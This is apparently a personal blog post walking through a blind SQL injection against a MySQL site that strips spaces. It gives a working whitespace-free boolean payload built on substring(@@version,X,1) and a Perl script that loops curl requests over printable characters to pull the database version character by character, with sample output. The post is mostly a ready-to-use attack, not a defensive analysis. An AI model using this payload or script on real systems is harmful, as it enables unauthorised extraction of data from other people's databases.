Blind

https://vikasprogrammer.tumblr.com/post/49251154907/blind-sql-injection-without-white-spaces

Blind SQL Injection without White Spaces

So, you just found out that doing www.example.com?id=1’ throws a nice mysql error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near “id=1” ORDER BY page_id desc LIMIT 1’ at line 1

Happy, well not yet!

Looking closely at the error and taking out just the output between near …. at line 1

'id=1’’ ORDER BY page_id desc LIMIT 1

This means, no matter what I input, it will be placed between ‘id=<myinput>’. Strange!

So to escape 'id=<myinput>' I tried, ?id=1’ or '1’='1, and interestingly :

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near “id=1” ORDER BY page_id desc LIMIT 1’ at line 1

And, more interestingly no mention of my beloved '1’='1, at this point I was basically angry.

I thought to myself, may be its removing the spaces, so I tried ?id=1'or'1’='1 and voila! no errors.

And moments laters, :(

Now, I had to create a query which can identify true and false condition AND with no white space.

[FAST FORWARD]

After a long list of tries, I got this :

/?id=1'or'1’=(SELECT(_utf8’.’)=substring(@@version,X,1))and'1’='1

So, ’.’ is the placeholder for all the testing chars and X is the counter to rotate for all the chars of output. So, as we know if X=2 then output has to be ’.’ i.e TRUE condition. In this case, I got NO “page not found error” and if I tried something else in place of ’.’, I get “page not found error”. Thats it! game over!

I wrote a quick perl script to iterate over all the output chars for all possible ascii printable chars. Profit!

Perl Script: http://pastebin.com/ixB5d90N

#Sript to iterate over the found SQL stmt for Blind SQLi
 
$cmd = "\@\@version";
$j=1;
while(1) { 
$done = 1;
 
    for ($i=42;$i<=126;$i++) {
        
        #print "trying",chr($i);
        $a = chr($i);
        if( ` curl "http://example.com/?id=1'or'1'=(SELECT(_utf8'$a')=substring($cmd,$j,1))and'1'='1" -s --max-redirs 0 -i ` =~ m/exist/) 
        {} else {
            print chr($i);
            $done = 0;
            last ;
        }   
        
 
    }
    if($done == 1) { last; } 
    $j++;
 
}
print "\ndone";

Output:

$ perl blind-version-test.pl

5.1.1-Ubuntu

Last updated